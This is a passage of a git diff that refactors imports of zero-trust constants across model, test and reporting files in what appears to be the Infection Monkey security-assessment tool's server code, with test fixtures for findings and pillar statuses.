TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding @@ -26,7 +26,7 @@ class AggregateFinding(Finding): def add_malicious_activity_to_timeline(events): AggregateFinding.create_or_add_to_existing( - test=TEST_MALICIOUS_ACTIVITY_TIMELINE, - status=STATUS_VERIFY, + test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE, + status=zero_trust_consts.STATUS_VERIFY, events=events ) diff --git a/monkey/monkey_island/cc/models/zero_trust/event.py b/monkey/monkey_island/cc/models/zero_trust/event.py index 6ad728d66..89b581fa0 100644 --- a/monkey/monkey_island/cc/models/zero_trust/event.py +++ b/monkey/monkey_island/cc/models/zero_trust/event.py @@ -2,7 +2,7 @@ from datetime import datetime from mongoengine import EmbeddedDocument, DateTimeField, StringField -from common.data.zero_trust_consts import EVENT_TYPES +import common.data.zero_trust_consts as zero_trust_consts class Event(EmbeddedDocument): @@ -19,7 +19,7 @@ class Event(EmbeddedDocument): timestamp = DateTimeField(required=True) title = StringField(required=True) message = StringField() - event_type = StringField(required=True, choices=EVENT_TYPES) + event_type = StringField(required=True, choices=zero_trust_consts.EVENT_TYPES) # LOGIC @staticmethod diff --git a/monkey/monkey_island/cc/models/zero_trust/finding.py b/monkey/monkey_island/cc/models/zero_trust/finding.py index df4eb12f7..90c9e1dc3 100644 --- a/monkey/monkey_island/cc/models/zero_trust/finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/finding.py @@ -5,7 +5,7 @@ Define a Document Schema for Zero Trust findings. from mongoengine import Document, StringField, EmbeddedDocumentListField -from common.data.zero_trust_consts import ORDERED_TEST_STATUSES, TESTS, TESTS_MAP, TEST_EXPLANATION_KEY, PILLARS_KEY +import common.data.zero_trust_consts as zero_trust_consts # Dummy import for mongoengine. # noinspection PyUnresolvedReferences from monkey_island.cc.models.zero_trust.event import Event @@ -30,18 +30,18 @@ class Finding(Document): times, or complex action we will perform - somewhat like an API. """ # SCHEMA - test = StringField(required=True, choices=TESTS) - status = StringField(required=True, choices=ORDERED_TEST_STATUSES) + test = StringField(required=True, choices=zero_trust_consts.TESTS) + status = StringField(required=True, choices=zero_trust_consts.ORDERED_TEST_STATUSES) events = EmbeddedDocumentListField(document_type=Event) # http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance meta = {'allow_inheritance': True} # LOGIC def get_test_explanation(self): - return TESTS_MAP[self.test][TEST_EXPLANATION_KEY] + return zero_trust_consts.TESTS_MAP[self.test][zero_trust_consts.TEST_EXPLANATION_KEY] def get_pillars(self): - return TESTS_MAP[self.test][PILLARS_KEY] + return zero_trust_consts.TESTS_MAP[self.test][zero_trust_consts.PILLARS_KEY] # Creation methods @staticmethod diff --git a/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py b/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py index 32a450f57..7633ed31f 100644 --- a/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py @@ -1,11 +1,11 @@ from mongoengine import StringField -from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_FAILED, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding def need_to_overwrite_status(saved_status, new_status): - return (saved_status == STATUS_PASSED) and (new_status == STATUS_FAILED) + return (saved_status == zero_trust_consts.STATUS_PASSED) and (new_status == zero_trust_consts.STATUS_FAILED) class SegmentationFinding(Finding): @@ -35,7 +35,7 @@ class SegmentationFinding(Finding): new_finding = SegmentationFinding( first_subnet=subnets[0], second_subnet=subnets[1], - test=TEST_SEGMENTATION, + test=zero_trust_consts.TEST_SEGMENTATION, status=status, events=[segmentation_event] ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py index 59bf1aa66..ce28ad7f7 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding @@ -10,9 +10,9 @@ class TestAggregateFinding(IslandTestCase): self.fail_if_not_testing_env() self.clean_finding_db() - test = TEST_MALICIOUS_ACTIVITY_TIMELINE - status = STATUS_VERIFY - events = [Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)] + test = zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE + status = zero_trust_consts.STATUS_VERIFY + events = [Event.create_event("t", "t", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)] self.assertEqual(len(Finding.objects(test=test, status=status)), 0) AggregateFinding.create_or_add_to_existing(test, status, events) @@ -29,9 +29,9 @@ class TestAggregateFinding(IslandTestCase): self.fail_if_not_testing_env() self.clean_finding_db() - test = TEST_MALICIOUS_ACTIVITY_TIMELINE - status = STATUS_VERIFY - event = Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK) + test = zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE + status = zero_trust_consts.STATUS_VERIFY + event = Event.create_event("t", "t", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) events = [event] self.assertEqual(len(Finding.objects(test=test, status=status)), 0) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_event.py b/monkey/monkey_island/cc/models/zero_trust/test_event.py index c0742407d..4a5afba50 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_event.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_event.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase @@ -14,7 +14,7 @@ class TestEvent(IslandTestCase): _ = Event.create_event( title=None, # title required message="bla bla", - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) with self.assertRaises(ValidationError): @@ -28,5 +28,5 @@ class TestEvent(IslandTestCase): _ = Event.create_event( title="skjs", message="bla bla", - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index c7190d0f1..4299f7eb4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import STATUS_FAILED, TEST_SEGMENTATION, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase @@ -20,20 +20,20 @@ class TestFinding(IslandTestCase): self.clean_finding_db() with self.assertRaises(ValidationError): - _ = Finding.save_finding(test="bla bla", status=STATUS_FAILED, events=[]) + _ = Finding.save_finding(test="bla bla", status=zero_trust_consts.STATUS_FAILED, events=[]) with self.assertRaises(ValidationError): - _ = Finding.save_finding(test=TEST_SEGMENTATION, status="bla bla", events=[]) + _ = Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status="bla bla", events=[]) def test_save_finding_sanity(self): self.fail_if_not_testing_env() self.clean_finding_db() - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 0) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 0) event_example = Event.create_event( - title="Event Title", message="event message", event_type=EVENT_TYPE_MONKEY_NETWORK) - Finding.save_finding(test=TEST_SEGMENTATION, status=STATUS_FAILED, events=[event_example]) + title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example]) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 1) - self.assertEqual(len(Finding.objects(status=STATUS_FAILED)), 1) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1) + self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py index 8258d7bdf..4afff9fe4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding @@ -12,11 +12,11 @@ class TestSegmentationFinding(IslandTestCase): first_segment = "1.1.1.0/24" second_segment = "2.2.2.0-2.2.2.254" third_segment = "3.3.3.3" - event = Event.create_event("bla", "bla", EVENT_TYPE_MONKEY_NETWORK) + event = Event.create_event("bla", "bla", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) SegmentationFinding.create_or_add_to_existing_finding( subnets=[first_segment, second_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -26,7 +26,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[second_segment, first_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -36,7 +36,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[first_segment, third_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -45,7 +45,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[second_segment, third_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index 98b99ac13..328be2e00 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py @@ -1,185 +1,197 @@ -from common.data.zero_trust_consts import AUTOMATION_ORCHESTRATION, DATA, PRINCIPLES, PRINCIPLE_DATA_TRANSIT, STATUS_FAILED, \ - TESTS_MAP, TEST_DATA_ENDPOINT_HTTP, TEST_EXPLANATION_KEY, STATUS_UNEXECUTED, TEST_DATA_ENDPOINT_ELASTIC, DEVICES, \ - PRINCIPLE_ENDPOINT_SECURITY, TEST_MACHINE_EXPLOITED, TEST_ENDPOINT_SECURITY_EXISTS, NETWORKS, PRINCIPLE_SEGMENTATION, \ - TEST_SEGMENTATION, PRINCIPLE_USER_BEHAVIOUR, STATUS_VERIFY, TEST_SCHEDULED_EXECUTION, PRINCIPLE_USERS_MAC_POLICIES, \ - TEST_COMMUNICATE_AS_NEW_USER, PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, TEST_MALICIOUS_ACTIVITY_TIMELINE, \ - PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, TEST_TUNNELING, PEOPLE, VISIBILITY_ANALYTICS, WORKLOADS, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService from monkey_island.cc.testing.IslandTestCase import IslandTestCase EXPECTED_DICT = { - AUTOMATION_ORCHESTRATION: [], - DATA: [ + zero_trust_consts.AUTOMATION_ORCHESTRATION: [], + zero_trust_consts.DATA: [ { - "principle": PRINCIPLES[PRINCIPLE_DATA_TRANSIT], - "status": STATUS_FAILED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_DATA_TRANSIT], + "status": zero_trust_consts.STATUS_FAILED, "tests": [ { - "status": STATUS_FAILED, - "test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_FAILED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_DATA_ENDPOINT_HTTP][zero_trust_consts.TEST_EXPLANATION_KEY] }, { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_DATA_ENDPOINT_ELASTIC][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC][zero_trust_consts.TEST_EXPLANATION_KEY] }, ] } ], - DEVICES: [ + zero_trust_consts.DEVICES: [ { - "principle": PRINCIPLES[PRINCIPLE_ENDPOINT_SECURITY], - "status": STATUS_FAILED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ENDPOINT_SECURITY], + "status": zero_trust_consts.STATUS_FAILED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_MACHINE_EXPLOITED][zero_trust_consts.TEST_EXPLANATION_KEY] }, { - "status": STATUS_FAILED, - "test": TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_FAILED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS][zero_trust_consts.TEST_EXPLANATION_KEY] }, ] } ], - NETWORKS: [ + zero_trust_consts.NETWORKS: [ { - "principle": PRINCIPLES[PRINCIPLE_SEGMENTATION], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_SEGMENTATION], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_SEGMENTATION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SEGMENTATION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR], - "status": STATUS_VERIFY, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USER_BEHAVIOUR], + "status": zero_trust_consts.STATUS_VERIFY, "tests": [ { - "status": STATUS_VERIFY, - "test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_VERIFY, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SCHEDULED_EXECUTION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_TUNNELING][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, ], - PEOPLE: [ + zero_trust_consts.PEOPLE: [ { - "principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR], - "status": STATUS_VERIFY, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USER_BEHAVIOUR], + "status": zero_trust_consts.STATUS_VERIFY, "tests": [ { - "status": STATUS_VERIFY, - "test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_VERIFY, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SCHEDULED_EXECUTION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] } ], - VISIBILITY_ANALYTICS: [ + zero_trust_consts.VISIBILITY_ANALYTICS: [ { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_TUNNELING][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, ], - WORKLOADS: [] + zero_trust_consts.WORKLOADS: [] } def save_example_findings(): # arrange - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 1 - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2 - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_PASSED, + []) # devices passed = 1 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_PASSED, + []) # devices passed = 2 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_FAILED, + []) # devices failed = 1 # devices unexecuted = 1 # people verify = 1 # networks verify = 1 - Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY, []) # people verify = 2 # networks verify = 2 - Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY, []) # data failed 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 2 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 3 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 4 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 5 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data verify 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY, []) # data verify 2 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY, []) # data passed 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_PASSED, []) class TestZeroTrustService(IslandTestCase): @@ -191,52 +203,52 @@ class TestZeroTrustService(IslandTestCase): expected = [ { - STATUS_FAILED: 5, - STATUS_VERIFY: 2, - STATUS_PASSED: 1, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 5, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 1, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "Data" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 2, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "People" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 2, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 4, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 4, "pillar": "Networks" }, { - STATUS_FAILED: 1, - STATUS_VERIFY: 0, - STATUS_PASSED: 2, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 1, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 2, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "Devices" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0, "pillar": "Workloads" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 3, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 3, "pillar": "Visibility & Analytics" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0, "pillar": "Automation & Orchestration" } ] @@ -279,13 +291,13 @@ class TestZeroTrustService(IslandTestCase): self.maxDiff = None expected = { - AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED, - DEVICES: STATUS_UNEXECUTED, - NETWORKS: STATUS_UNEXECUTED, - PEOPLE: STATUS_UNEXECUTED, - VISIBILITY_ANALYTICS: STATUS_UNEXECUTED, - WORKLOADS: STATUS_UNEXECUTED, - DATA: STATUS_UNEXECUTED + zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DEVICES: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED } self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected) @@ -293,13 +305,13 @@ class TestZeroTrustService(IslandTestCase): save_example_findings() expected = { - AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED, - DEVICES: STATUS_FAILED, - NETWORKS: STATUS_VERIFY, - PEOPLE: STATUS_VERIFY, - VISIBILITY_ANALYTICS: STATUS_UNEXECUTED, - WORKLOADS: STATUS_UNEXECUTED, - DATA: STATUS_FAILED + zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DEVICES: zero_trust_consts.STATUS_FAILED, + zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_VERIFY, + zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_VERIFY, + zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED } self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected) diff --git a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py index 24bd81e0d..9937c0b6d 100644 --- a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py @@ -1,8 +1,7 @@ import json -from common.data.zero_trust_consts import PILLARS, STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED, \ - PILLARS_TO_TESTS, TESTS_MAP, PILLARS_KEY, PRINCIPLES_TO_TESTS, PRINCIPLES_TO_PILLARS, PRINCIPLES, ORDERED_TEST_STATUSES, \ - TEST_EXPLANATION_KEY, FINDING_EXPLANATION_BY_STATUS_KEY +import common.data.zero_trust_consts as zero_trust_consts + from monkey_island.cc.models.zero_trust.finding import Finding @@ -10,7 